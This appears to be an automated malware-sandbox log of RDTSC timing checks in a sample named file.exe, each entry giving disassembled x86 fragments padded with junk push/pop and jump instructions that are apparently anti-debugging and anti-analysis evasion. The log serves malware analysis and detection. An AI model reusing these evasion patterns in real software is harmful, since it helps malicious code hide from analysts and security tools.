Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11787DB second address: 1178803 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 stc 0x00000009 call 00007FEDA51D0EB9h 0x0000000e push ecx 0x0000000f pushad 0x00000010 jl 00007FEDA51D0EB6h 0x00000016 jne 00007FEDA51D0EB6h 0x0000001c popad 0x0000001d pop ecx 0x0000001e push eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pop edi 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1178803 second address: 1178835 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEDA531E8D4h 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FEDA531E8CBh 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1178835 second address: 117883F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEDA51D0EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117883F second address: 1178849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FEDA531E8C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1178849 second address: 117885A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117885A second address: 117885E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1178E54 second address: 1178E6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEDA51D0EC1h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117943D second address: 117945E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b jc 00007FEDA531E8D8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FEDA531E8C6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11794F6 second address: 11794FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1179AB2 second address: 1179AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1179AB6 second address: 1179B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e je 00007FEDA51D0EBAh 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 nop 0x00000019 xchg eax, ebx 0x0000001a jo 00007FEDA51D0ECDh 0x00000020 jmp 00007FEDA51D0EC7h 0x00000025 push eax 0x00000026 pushad 0x00000027 jp 00007FEDA51D0EB8h 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FEDA51D0EBEh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B9D1 second address: 117B9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B9D6 second address: 117BA01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jng 00007FEDA51D0EBCh 0x00000011 jnc 00007FEDA51D0EB6h 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007FEDA51D0EB6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117C2DF second address: 117C30B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FEDA531E8D2h 0x0000000c jno 00007FEDA531E8C6h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007FEDA531E8C8h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D020 second address: 117D026 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D026 second address: 117D02C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D02C second address: 117D030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D8E1 second address: 117D8E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D8E7 second address: 117D902 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D902 second address: 117D907 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180DDE second address: 1180DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180DE4 second address: 1180DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FEDA531E8D0h 0x0000000a jmp 00007FEDA531E8CAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180DF8 second address: 1180DFD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180DFD second address: 1180E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180E03 second address: 1180E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnp 00007FEDA51D0ECEh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180E2C second address: 1180E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEDA531E8C6h 0x0000000a jne 00007FEDA531E8C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180E3E second address: 1180E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180E49 second address: 1180E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1135D2A second address: 1135D65 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jmp 00007FEDA51D0EC9h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEDA51D0EC5h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1135D65 second address: 1135D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118278C second address: 1182792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1182792 second address: 1182796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1182F73 second address: 1182FF5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, ebx 0x0000000b push dword ptr fs:[00000000h] 0x00000012 mov edi, 2711DB9Ch 0x00000017 mov dword ptr [ebp+122D2216h], edx 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push ecx 0x00000027 call 00007FEDA51D0EB8h 0x0000002c pop ecx 0x0000002d mov dword ptr [esp+04h], ecx 0x00000031 add dword ptr [esp+04h], 0000001Ah 0x00000039 inc ecx 0x0000003a push ecx 0x0000003b ret 0x0000003c pop ecx 0x0000003d ret 0x0000003e or dword ptr [ebp+122D2CEBh], esi 0x00000044 mov eax, dword ptr [ebp+122D1321h] 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007FEDA51D0EB8h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 push FFFFFFFFh 0x00000066 mov ebx, 0FF6E402h 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e push edx 0x0000006f jnl 00007FEDA51D0EB6h 0x00000075 pop edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1183E4A second address: 1183E50 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1182FF5 second address: 1182FFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1183E50 second address: 1183E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1184F42 second address: 1184F5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185CDB second address: 1185CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1183E56 second address: 1183E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1184F5B second address: 1184F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185CE3 second address: 1185D01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEDA51D0EC3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1184F61 second address: 1184F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185D01 second address: 1185D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 xor ebx, 291CE53Dh 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FEDA51D0EB8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a call 00007FEDA51D0EC4h 0x0000002f pop ebx 0x00000030 push 00000000h 0x00000032 sub dword ptr [ebp+122D251Bh], ebx 0x00000038 xchg eax, esi 0x00000039 push esi 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FEDA51D0EC7h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185EF4 second address: 1185EFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185EFA second address: 1185F0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FEDA51D0EB8h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185FF4 second address: 1185FFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11870C4 second address: 11870C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1189F07 second address: 1189F2D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEDA531E8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FEDA531E8CFh 0x00000011 jbe 00007FEDA531E8C8h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118B5C5 second address: 118B5E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEDA51D0EBEh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEDA51D0EBBh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1187FB5 second address: 1187FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118BBB3 second address: 118BBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118CAB2 second address: 118CB1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FEDA531E8C8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov bl, cl 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007FEDA531E8C8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 push 00000000h 0x00000043 xchg eax, esi 0x00000044 jmp 00007FEDA531E8D1h 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118CB1C second address: 118CB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118BD5D second address: 118BD63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118BD63 second address: 118BD69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118BD69 second address: 118BDEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b adc ebx, 25AD7B4Bh 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007FEDA531E8C8h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov edi, 00962E3Bh 0x0000003e mov eax, dword ptr [ebp+122D1339h] 0x00000044 cmc 0x00000045 push FFFFFFFFh 0x00000047 movsx ebx, cx 0x0000004a nop 0x0000004b jng 00007FEDA531E8D8h 0x00000051 jmp 00007FEDA531E8D2h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007FEDA531E8D1h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118FB5D second address: 118FB63 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118FB63 second address: 118FB9C instructions: 0x00000000 rdtsc 0x00000002 js 00007FEDA531E8DEh 0x00000008 jmp 00007FEDA531E8D8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 mov ebx, edx 0x00000014 push 00000000h 0x00000016 adc edi, 4043AB5Ch 0x0000001c push eax 0x0000001d jc 00007FEDA531E8D4h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1191AAF second address: 1191AC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FEDA51D0EB6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1191AC6 second address: 1191ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1191ACA second address: 1191AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1191AD7 second address: 1191AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA531E8D0h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1191AEC second address: 1191AF1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1192CCB second address: 1192CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1193E0E second address: 1193E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FEDA51D0EBBh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1191E09 second address: 1191E25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1193E25 second address: 1193E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA51D0EC8h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1193E42 second address: 1193EB2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEDA531E8CCh 0x00000008 jng 00007FEDA531E8C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FEDA531E8C8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d jng 00007FEDA531E8C8h 0x00000033 mov bl, 3Eh 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007FEDA531E8C8h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 0000001Bh 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 adc di, 068Ah 0x00000056 xor dword ptr [ebp+122D36D3h], eax 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1193EB2 second address: 1193ECB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1193ECB second address: 1193ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1193ED1 second address: 1193EEF instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEDA51D0EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edx 0x0000000f je 00007FEDA51D0EB6h 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jng 00007FEDA51D0EB6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1194107 second address: 119411C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119411C second address: 1194131 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEDA51D0EC0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1198868 second address: 119886E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119886E second address: 1198876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1196784 second address: 1196788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1196788 second address: 119678E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119EC42 second address: 119EC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119EC48 second address: 119EC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119EC4F second address: 119EC57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119EC57 second address: 119EC5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119EC5C second address: 119EC61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119EC61 second address: 119EC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119EC67 second address: 119EC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
